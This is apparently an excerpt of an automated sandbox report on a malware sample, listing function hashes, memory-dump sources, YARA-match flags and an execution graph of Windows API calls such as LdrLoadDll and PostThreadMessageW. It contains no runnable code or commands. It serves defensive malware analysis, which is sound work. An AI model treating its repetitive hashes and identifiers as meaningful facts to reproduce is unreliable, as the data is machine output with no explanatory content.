                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4e4a0c44975b3c40ecb1bed988587d479b26fa0f6efaa1c4d80c7e1d8e5b9d73
                                                • Instruction ID: 28219a1965117e0b509a1521966a4e01295c8708d87ea474c984b8835358d98b
                                                • Opcode Fuzzy Hash: 4e4a0c44975b3c40ecb1bed988587d479b26fa0f6efaa1c4d80c7e1d8e5b9d73
                                                • Instruction Fuzzy Hash: 40D1263581065A8ACB10EFA4D991B9DF371FF95300F11C79AE0097B265EB70AAD5CF81
                                                Function 05330006 Relevance: .2, Instructions: 237COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1756552176.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5330000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 170ce76ac2bd402fa20c742d9bcd86a889aa83251701b317f8ca13a242d8745d
                                                • Instruction ID: 1025d08f5e377cadb52d123ff21bc9b1df23d1b75bce3baee016f8ccfef92c68
                                                • Opcode Fuzzy Hash: 170ce76ac2bd402fa20c742d9bcd86a889aa83251701b317f8ca13a242d8745d
                                                • Instruction Fuzzy Hash: A8C15AB0C81B459FD710CF64EA483893BB1BB8539CF95CB09D2616B6E5DBB8146ACF40
                                                Function 0755AD78 Relevance: .1, Instructions: 137COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be450e86aa1da165536c0a5106c9f737c03c677b63333d93c3fe2052a3a89fc6
                                                • Instruction ID: e9e96aff6725714116dfc5e0db6322d769501e2ade4d5cfb1cc2e2813efa52be
                                                • Opcode Fuzzy Hash: be450e86aa1da165536c0a5106c9f737c03c677b63333d93c3fe2052a3a89fc6
                                                • Instruction Fuzzy Hash: FA511AB4E0021A8BDB14DFA9D9405EEFBF2FF89304F24C16AD418A7256D7319942CFA1
                                                Function 0755B1B1 Relevance: .1, Instructions: 135COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aecb394639ea4661a54d5e229cba46a2eb25b317a2cb951b4710701085b4d048
                                                • Instruction ID: 9ab5884729f54094f0d6d3f5efd92858086721c8c0f0e9c536dcf9b27d4630fa
                                                • Opcode Fuzzy Hash: aecb394639ea4661a54d5e229cba46a2eb25b317a2cb951b4710701085b4d048
                                                • Instruction Fuzzy Hash: 1B511AB5E0021A8FDB14DFAAC5845AEFBF2FF89304F24C16AD818A7256D7319941CF61

                                                Execution Graph

                                                Execution Coverage:1.2%
                                                Dynamic/Decrypted Code Coverage:5%
                                                Signature Coverage:9.4%
                                                Total number of Nodes:139
                                                Total number of Limit Nodes:11
                                                execution_graph 94360 424803 94361 42481f 94360->94361 94362 424847 94361->94362 94363 42485b 94361->94363 94364 42bee3 NtClose 94362->94364 94370 42bee3 94363->94370 94366 424850 94364->94366 94367 424864 94373 42e0e3 RtlAllocateHeap 94367->94373 94369 42486f 94371 42befd 94370->94371 94372 42bf0e NtClose 94371->94372 94372->94367 94373->94369 94374 42f0c3 94375 42f0d3 94374->94375 94376 42f0d9 94374->94376 94379 42e0a3 94376->94379 94378 42f0ff 94382 42c213 94379->94382 94381 42e0be 94381->94378 94383 42c22d 94382->94383 94384 42c23e RtlAllocateHeap 94383->94384 94384->94381 94488 42b4d3 94489 42b4f0 94488->94489 94492 1942df0 LdrInitializeThunk 94489->94492 94490 42b518 94492->94490 94493 42f1f3 94494 42f163 94493->94494 94495 42e0a3 RtlAllocateHeap 94494->94495 94496 42f1c0 94494->94496 94497 42f19d 94495->94497 94498 42dfc3 RtlFreeHeap 94497->94498 94498->94496 94499 424b93 94500 424bac 94499->94500 94501 424bf7 94500->94501 94504 424c37 94500->94504 94506 424c3c 94500->94506 94502 42dfc3 RtlFreeHeap 94501->94502 94503 424c07 94502->94503 94505 42dfc3 RtlFreeHeap 94504->94505 94505->94506 94507 428293 94508 4282f8 94507->94508 94509 428333 94508->94509 94512 418a13 94508->94512 94511 428315 94514 418a21 94512->94514 94513 418b8d 94513->94511 94514->94513 94516 42bee3 NtClose 94514->94516 94515 418c22 94515->94511 94516->94515 94385 413e43 94386 413e50 94385->94386 94391 417a03 94386->94391 94388 413e7b 94389 413ec0 94388->94389 94390 413eaf PostThreadMessageW 94388->94390 94390->94389 94393 417a27 94391->94393 94392 417a2e 94392->94388 94393->94392 94395 417a4d 94393->94395 94398 42f4a3 LdrLoadDll 94393->94398 94396 417a63 LdrLoadDll 94395->94396 94397 417a7a 94395->94397 94396->94397 94397->94388 94398->94395 94517 41b133 94518 41b177 94517->94518 94519 41b198 94518->94519 94520 42bee3 NtClose 94518->94520 94520->94519 94521 4138d3 94522 4138f5 94521->94522 94524 42c173 94521->94524 94525 42c190 94524->94525 94528 1942c70 LdrInitializeThunk 94525->94528 94526 42c1b8 94526->94522 94528->94526 94399 401a64 94400 401a80 94399->94400 94403 42f593 94400->94403 94406 42db73 94403->94406 94407 42db99 94406->94407 94418 407313 94407->94418 94409 42dbaf 94410 401b69 94409->94410 94421 41af43 94409->94421 94412 42dbce 94413 42dbe3 94412->94413 94436 42c2b3 94412->94436 94432 427ba3 94413->94432 94416 42dbfd 94417 42c2b3 ExitProcess 94416->94417 94417->94410 94419 407320 94418->94419 94439 4166d3 94418->94439 94419->94409 94422 41af6f 94421->94422 94463 41ae33 94422->94463 94425 41af9c 94426 42bee3 NtClose 94425->94426 94428 41afa7 94425->94428 94426->94428 94427 41afb4 94429 42bee3 NtClose 94427->94429 94430 41afd0 94427->94430 94428->94412 94431 41afc6 94429->94431 94430->94412 94431->94412 94433 427c05 94432->94433 94435 427c12 94433->94435 94474 418563 94433->94474 94435->94416 94437 42c2cd 94436->94437 94438 42c2de ExitProcess 94437->94438 94438->94413 94441 4166ed 94439->94441 94440 416706 94440->94419 94441->94440 94443 42c953 94441->94443 94445 42c96d 94443->94445 94444 42c99c 94444->94440 94445->94444 94450 42b523 94445->94450 94451 42b53d 94450->94451 94457 1942c0a 94451->94457 94452 42b569 94454 42dfc3 94452->94454 94460 42c263 94454->94460 94456 42ca15 94456->94440 94458 1942c11 94457->94458 94459 1942c1f LdrInitializeThunk 94457->94459 94458->94452 94459->94452 94461 42c280 94460->94461 94462 42c291 RtlFreeHeap 94461->94462 94462->94456 94464 41ae4d 94463->94464 94468 41af29 94463->94468 94469 42b5c3 94464->94469 94467 42bee3 NtClose 94467->94468 94468->94425 94468->94427 94470 42b5e0 94469->94470 94473 19435c0 LdrInitializeThunk 94470->94473 94471 41af1d 94471->94467 94473->94471 94476 41858d 94474->94476 94475 4189fb 94475->94435 94476->94475 94482 413ab3 94476->94482 94478 41869a 94478->94475 94479 42dfc3 RtlFreeHeap 94478->94479 94480 4186b2 94479->94480 94480->94475 94481 42c2b3 ExitProcess 94480->94481 94481->94475 94486 413ad3 94482->94486 94484 413b3c 94484->94478 94485 413b32 94485->94478 94486->94484 94487 41b213 RtlFreeHeap LdrInitializeThunk 94486->94487 94487->94485 94529 1942b60 LdrInitializeThunk 94530 418c18 94531 418c22 94530->94531 94532 42bee3 NtClose 94530->94532 94532->94531

                                                Executed Functions

                                                Function 00417A03 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 453 417a03-417a2c call 42ecc3 456 417a32-417a40 call 42f203 453->456 457 417a2e-417a31 453->457 460 417a50-417a61 call 42d663 456->460 461 417a42-417a4d call 42f4a3 456->461 466 417a63-417a77 LdrLoadDll 460->466 467 417a7a-417a7d 460->467 461->460 466->467
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A75
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 901762d70c1facbf16f74a98b42673f6f147b3b8484110a3e016d9ffbcbb916f
                                                • Instruction ID: ee6c7ceef1adf1cf5f0f5272745ac9c454e7c3774a2bd0dbb7ae4b93fd6402ff
                                                • Opcode Fuzzy Hash: 901762d70c1facbf16f74a98b42673f6f147b3b8484110a3e016d9ffbcbb916f
                                                • Instruction Fuzzy Hash: AF015EB5E4020DABDB10DBE5DC42FDEB7789F14308F4041AAE90897240F635EB488B95
                                                Function 0042BEE3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042BF17
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 5bbb66dc0cd2e4fa1e542e3d13877265f0de1094121c625da3f843a8cf084873
                                                • Instruction ID: 506154e8a8f3fb9aa3bbf7faef934b62bf1fce9cdcae224abcf988a766b44963
                                                • Opcode Fuzzy Hash: 5bbb66dc0cd2e4fa1e542e3d13877265f0de1094121c625da3f843a8cf084873
                                                • Instruction Fuzzy Hash: 60E0DF362002007BC110BB5ADC01F9B739CDBC1714F00401AFA0C67241C674790486E5
                                                Function 01942B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a2986942f912986ad9d35b6065559cfff9edf2fc54500051fb01ad50af5466c0
                                                • Instruction ID: 781bdac44dcaa942e305f41a13ad1a71c9294f0a9537ecd9ef78c0f0dad760b4
                                                • Opcode Fuzzy Hash: a2986942f912986ad9d35b6065559cfff9edf2fc54500051fb01ad50af5466c0
                                                • Instruction Fuzzy Hash: 8D900261202500034245B1594418616804E97E0201B55C021F5055590DC52589916725
                                                Function 01942DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 5e923df62e25c337fe6d463c3553fc1feadbaac9da54bb36f1dea9c41fa669a8
                                                • Instruction ID: b88ec5dfcee6c88d97523c6223c1000f824802ea6d0b3becf0bf10ae39d0a0b4
                                                • Opcode Fuzzy Hash: 5e923df62e25c337fe6d463c3553fc1feadbaac9da54bb36f1dea9c41fa669a8
                                                • Instruction Fuzzy Hash: 6390023120150413D251B1594508707404D97D0241F95C412B4465558DD6568A52A721
                                                Function 01942C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c18d06a56d005c348813f5255d8ace877cd0c045bb3838374f6f65182b0766a8
                                                • Instruction ID: 4fa48646e9f6e5bf8766a49ffc639f747e4e0d585fe0712b5b6681a78226a8ab
                                                • Opcode Fuzzy Hash: c18d06a56d005c348813f5255d8ace877cd0c045bb3838374f6f65182b0766a8
                                                • Instruction Fuzzy Hash: 8D90023120158802D250B159840874A404997D0301F59C411B8465658DC69589917721
                                                Function 019435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8c276de4c4438852bad5cbfbdd9bdd06b760b602b1166b4a464b1f9c37687da5
                                                • Instruction ID: 695c8cae8014269572ea4c06d69936cedbfc6ac427fced88eb6c39818b69df1f
                                                • Opcode Fuzzy Hash: 8c276de4c4438852bad5cbfbdd9bdd06b760b602b1166b4a464b1f9c37687da5
                                                • Instruction Fuzzy Hash: 6490023160560402D240B1594518706504997D0201F65C411B4465568DC7958A516BA2
                                                Function 00413DD1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 6fI63K3E$6fI63K3E
                                                • API String ID: 0-4267580142
                                                • Opcode ID: 382a5960e9bded4aa4a20b9beb4643f608b5cae72a131b9b6322675079b5e06e
                                                • Instruction ID: d9b7d7916e3313f7f9dcd5ac4ebbd146193d0deaa9b94fc4331ab0b980146946
                                                • Opcode Fuzzy Hash: 382a5960e9bded4aa4a20b9beb4643f608b5cae72a131b9b6322675079b5e06e
                                                • Instruction Fuzzy Hash: 91219EB2A08259BF87119F98AC819EFBB7CEF81315740425BF514DB250D3394D42C7E8
                                                Function 00413E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(6fI63K3E,00000111,00000000,00000000), ref: 00413EBA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 6fI63K3E$6fI63K3E
                                                • API String ID: 1836367815-4267580142
                                                • Opcode ID: 8f2a2769fb4bc3ca514b35d70dd5f70277faa013da5bd438c3b080249c9fb096
                                                • Instruction ID: 949321555e6023f59c75bf3594f14c98795f7976dc38317a22bcaf5d9c514494
                                                • Opcode Fuzzy Hash: 8f2a2769fb4bc3ca514b35d70dd5f70277faa013da5bd438c3b080249c9fb096
                                                • Instruction Fuzzy Hash: 3E110672D4421C7BDB109EA5AC81EDEBB7C9F80665F01415AF904A7210D67E4E0687A4
                                                Function 00413E3B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(6fI63K3E,00000111,00000000,00000000), ref: 00413EBA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 6fI63K3E$6fI63K3E
                                                • API String ID: 1836367815-4267580142
                                                • Opcode ID: d05b8d31ce5f905226b3bc0a70cab5c60e5d9834be2e185583da2fa6c23060da
                                                • Instruction ID: f2d4a655a7995a759e15afa0ba4928d626f50fe1628120aa6bea1a252c01dc6f
                                                • Opcode Fuzzy Hash: d05b8d31ce5f905226b3bc0a70cab5c60e5d9834be2e185583da2fa6c23060da
                                                • Instruction Fuzzy Hash: 911125B2D4021C7AEB009BE29C81EEF7B7CDF40694F00812AFA04A7240E6794E0687A5
                                                Function 00413E43 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(6fI63K3E,00000111,00000000,00000000), ref: 00413EBA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 6fI63K3E$6fI63K3E
                                                • API String ID: 1836367815-4267580142
                                                • Opcode ID: 137933c23872046728f152d65c3e234f186f32a937739b7dab7be4c0240390a4
                                                • Instruction ID: e7c6f6c7deff218463741ad906fc699e02f8815cf2db209e6bd7a447bae2e7dc
                                                • Opcode Fuzzy Hash: 137933c23872046728f152d65c3e234f186f32a937739b7dab7be4c0240390a4
                                                • Instruction Fuzzy Hash: 1301C871D0021C7ADB119BE59C81DEF7B7CDF41694F058069FA0477241E5794E0687A5
                                                Function 0042C263 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 278 42c263-42c2a7 call 404703 call 42d153 RtlFreeHeap
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C2A2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: ^gA
                                                • API String ID: 3298025750-2986628814
                                                • Opcode ID: 17568c7ae09f18499743ae8ac1d4d72313a42befbe6544b35fb4508f614ffe59
                                                • Instruction ID: 94010e64c3ac40ebaa8637d687da895893a5285f039648f1696056085be2b873
                                                • Opcode Fuzzy Hash: 17568c7ae09f18499743ae8ac1d4d72313a42befbe6544b35fb4508f614ffe59
                                                • Instruction Fuzzy Hash: 7DE06DB26042047BD610EE99DC41EAB33ACEFC9710F00441AFA18A7242D674B910CAB9
                                                Function 00417A83 Relevance: 1.5, APIs: 1, Instructions: 49libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 440 417a83-417aa0 441 417a32-417a40 call 42f203 440->441 442 417aa2-417aa4 440->442 445 417a50-417a61 call 42d663 441->445 446 417a42-417a4d call 42f4a3 441->446 451 417a63-417a77 LdrLoadDll 445->451 452 417a7a-417a7d 445->452 446->445 451->452
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A75
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 9aead03d5917cd9eedf64c213fed65a1ff43d0142e135a2e87ed648fb51c44ed
                                                • Instruction ID: 5467ce7baa1be35fd542a387db4fa72fba50a4fd1dc026b6fc6d13751b3d1b69
                                                • Opcode Fuzzy Hash: 9aead03d5917cd9eedf64c213fed65a1ff43d0142e135a2e87ed648fb51c44ed
                                                • Instruction Fuzzy Hash: B50124B1E04108BBDB10DBA49C52FDFBB78DF11348F1440AAE94893241F635EA05C7A1
                                                Function 00417AA5 Relevance: 1.5, APIs: 1, Instructions: 35libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 468 417aa5-417ab0 469 417ab2-417abb 468->469 470 417a58-417a61 468->470 473 417aa2-417aa4 469->473 474 417abd-417ac6 469->474 471 417a63-417a77 LdrLoadDll 470->471 472 417a7a-417a7d 470->472 471->472
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A75
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: f18770b21bcb04f3c1ad08bc0ddfbb7babe701ebe995f293496980a2fee2e74a
                                                • Instruction ID: 649d61dad93b3462b7384ddc33fd9c8a8ef157cfa8b9e39ff11f18283cf64051
                                                • Opcode Fuzzy Hash: f18770b21bcb04f3c1ad08bc0ddfbb7babe701ebe995f293496980a2fee2e74a
                                                • Instruction Fuzzy Hash: A5F0903920811AAED710CA94CC41FDDBBB4EF45694F04479AE968971C1D631AA498785
                                                Function 0042C213 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 475 42c213-42c254 call 404703 call 42d153 RtlAllocateHeap
                                                APIs
                                                • RtlAllocateHeap.NTDLL(?,0041E3BE,?,?,00000000,?,0041E3BE,?,?,?), ref: 0042C24F
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: e6e382b7dac3f798f8f3023e391c5777cc1d513eddb89b76d97a022a8894131b
                                                • Instruction ID: bf3421da550d34a33725b684d4c833155ef629d3a1766f7896df30323ebfda8e
                                                • Opcode Fuzzy Hash: e6e382b7dac3f798f8f3023e391c5777cc1d513eddb89b76d97a022a8894131b
                                                • Instruction Fuzzy Hash: C3E065B2604304BBD610EE99EC41EEB33ECEFC9754F004019FA08A7241C674B9108AB9
                                                Function 0042C2B3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                Download Yara Rule
                                                APIs
                                                • ExitProcess.KERNEL32(?,00000000,?,?,7311DEDF,?,?,7311DEDF), ref: 0042C2E7
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_dGHiTqj3AB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: 692240f82839e6ec99a492d051d73a3b7a6c2aa1fbb4de7833b58e73ace8f1c9
                                                • Instruction ID: ca7a2a84a7f801cb252aaa35fdd09469841853465a89a090f00c38a162972b51
                                                • Opcode Fuzzy Hash: 692240f82839e6ec99a492d051d73a3b7a6c2aa1fbb4de7833b58e73ace8f1c9
                                                • Instruction Fuzzy Hash: EDE04F316442157BC610AA5ADC41FA7B76CDFC5754F50442AFA0867281C675B91187E4
                                                Function 01942C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2853b0bf168de2edc9cdd16f8a53fadb0e8054a3cf21c660245a470b6986e42b
                                                • Instruction ID: ffda595f58be86621a48712c972bbf4c2eb58e511873b095641db5e5f09c3a0b
                                                • Opcode Fuzzy Hash: 2853b0bf168de2edc9cdd16f8a53fadb0e8054a3cf21c660245a470b6986e42b
                                                • Instruction Fuzzy Hash: 92B09B71D015C5C6DB51E764560CB17794477D0702F15C061F2070641F4778C1D1E775

                                                Non-executed Functions

                                                Function 01982349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2160512332
                                                • Opcode ID: 14a836881f8b090d09a48607ad6aa5d7e5cdb5c791c2db647cafb8c7289ba40c
                                                • Instruction ID: 206f3d79f1f89dffcb43c06b9708f7d851c775cd21a2bdc2996892bd2f77d5b5
                                                • Opcode Fuzzy Hash: 14a836881f8b090d09a48607ad6aa5d7e5cdb5c791c2db647cafb8c7289ba40c
                                                • Instruction Fuzzy Hash: FB929071608342AFE721EF19C880F6BBBE8BB84754F04492DFA99D7290D774E944CB52
                                                Function 01938620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                Download Yara Rule
                                                Strings
                                                • Critical section address, xrefs: 01975425, 019754BC, 01975534
                                                • Critical section debug info address, xrefs: 0197541F, 0197552E
                                                • Address of the debug info found in the active list., xrefs: 019754AE, 019754FA
                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019754CE
                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019754E2
                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01975543
                                                • double initialized or corrupted critical section, xrefs: 01975508
                                                • Thread identifier, xrefs: 0197553A
                                                • Critical section address., xrefs: 01975502
                                                • corrupted critical section, xrefs: 019754C2
                                                • Invalid debug info address of this critical section, xrefs: 019754B6
                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0197540A, 01975496, 01975519
                                                • 8, xrefs: 019752E3
                                                • undeleted critical section in freed memory, xrefs: 0197542B
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                • API String ID: 0-2368682639
                                                • Opcode ID: ef7392d864993173cac63898f455f3b2f4371b7dde20ada268f44aaae9c7f426
